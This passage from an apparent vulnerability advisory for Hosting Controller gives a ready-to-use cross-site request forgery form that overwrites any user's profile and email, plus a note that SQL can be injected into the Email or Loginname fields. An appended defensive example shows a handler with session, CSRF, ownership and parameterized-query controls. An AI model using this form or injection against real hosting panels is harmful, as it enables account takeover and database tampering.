4- [Remote Attacker] can change any user's profile.
 4.1- Use "ChangeProfiles.htm":
        ~~~~~~~~~~~~~~~~4.1.1 ChangeProfiles.htm~~~~~~~~~~~~~~~~~~~~~~~~
        <script>
            // Called on submit: points the form at Addreseller.asp on the
            // HC host typed into the "URL" box, then lets the POST proceed.
            function check() {
                var _action = '/Hosting/Addreseller.asp?loginname=ResAdmin';
                document.forms['frmChangeProfile'].action =
                    document.getElementsByName('URL')[0].value + _action;
                return true;
            }
        </script>
        URL: <input type="text" name="URL" /><br />
        <form name="frmChangeProfile" action="" method="post" onsubmit="return check()">
            UserName: <input type="text" name="loginname" value="Victim User" /> <br />
            first name: <input type="text" name="first_name" value="" /> <br />
            last name: <input type="text" name="last_name" value="" /> <br />
            description: <input type="text" name="description" value="" /> <br />
            company: <input type="text" name="company" value="" /> <br />
            email: <input type="text" name="email" value="User's Actual Email Address" /> <br />
            country: <input type="text" name="country" value="" /> <br />
            state: <input type="text" name="state" value="" /> <br />
            city: <input type="text" name="city" value="" /> <br />
            address: <input type="text" name="address" value="" /> <br />
            phone: <input type="text" name="phone" value="" /> <br />
            fax: <input type="text" name="fax" value="" /> <br />
            zip: <input type="text" name="zip" value="" /> <br />
            <input type="submit" />
        </form>
        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        Note: "ResAdmin" in "_action" can be changed to "hcadmin" or another valid username.
    4.2- Now go to: http://[HC URL]/hosting/xml_addresellerresult.asp
    4.3- A SQL query can also be injected into the "Email" or "Loginname" field to change a user's profile without knowing that user's actual email address.
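The flaw above combines three missing controls: the profile handler does not tie the target account to the authenticated session, it accepts a cross-site POST, and it splices the submitted "Email"/"Loginname" values into SQL. The following is an added defensive example, not Hosting Controller's code and not part of this advisory, showing a profile-update handler that applies all three controls. The session shape, the `FakeDb` stand-in for a driver that accepts bound parameters, the `Users` table and every function name are assumptions.

```javascript
// Added defensive example (not Hosting Controller code): a profile-update
// handler with the controls the advisory's endpoint lacks. The session
// object, FakeDb driver, table/column names and function names are assumed.

const LOGINNAME_RE = /^[A-Za-z0-9_.-]{1,32}$/;
const EMAIL_RE = /^[^\s@'"]+@[^\s@'"]+\.[A-Za-z]{2,}$/;
// Allowlist of updatable columns; column names never come from the request.
const PROFILE_FIELDS = ['first_name', 'last_name', 'description', 'company',
  'email', 'country', 'state', 'city', 'address', 'phone', 'fax', 'zip'];

// Stand-in for a DB driver with parameterized statements: it records the
// SQL text and the bound values instead of executing anything.
class FakeDb {
  constructor() { this.calls = []; }
  execute(sql, params) {
    this.calls.push({ sql, params });
    return { rowsAffected: 1 };
  }
}

function updateProfile(session, body, db) {
  // 1. Authentication: no session, no update.
  if (!session || !session.user) {
    return { ok: false, status: 401, error: 'not authenticated' };
  }
  // 2. Anti-CSRF: a form hosted elsewhere cannot know the per-session token.
  if (!body.csrf_token || body.csrf_token !== session.csrfToken) {
    return { ok: false, status: 403, error: 'missing or invalid CSRF token' };
  }
  // 3. Authorization: only the account owner or an admin may change a profile.
  const target = String(body.loginname || '');
  if (target !== session.user && session.role !== 'admin') {
    return { ok: false, status: 403, error: "cannot modify another user's profile" };
  }
  // 4. Input validation on the fields the advisory names as injectable.
  if (!LOGINNAME_RE.test(target)) {
    return { ok: false, status: 400, error: 'invalid loginname' };
  }
  const email = String(body.email || '');
  if (!EMAIL_RE.test(email)) {
    return { ok: false, status: 400, error: 'invalid email' };
  }
  // 5. Parameterized UPDATE: user-controlled values are bound, never
  //    concatenated into the statement text, so quotes cannot alter it.
  const setClause = PROFILE_FIELDS.map((f) => `${f} = ?`).join(', ');
  const params = PROFILE_FIELDS.map((f) =>
    (f === 'email' ? email : String(body[f] || '').slice(0, 255)));
  params.push(target);
  const sql = `UPDATE Users SET ${setClause} WHERE loginname = ?`;
  const result = db.execute(sql, params);
  return { ok: true, status: 200, rowsAffected: result.rowsAffected };
}
```

The order of checks matters: the request is rejected for a missing session or token before any request field is inspected, and the ownership check runs before validation so that an attacker probing another account learns nothing about which values are accepted. A single quote in a legitimate value such as `O'Brien` reaches the database only as a bound parameter, so it is stored literally rather than terminating the string in the SQL text.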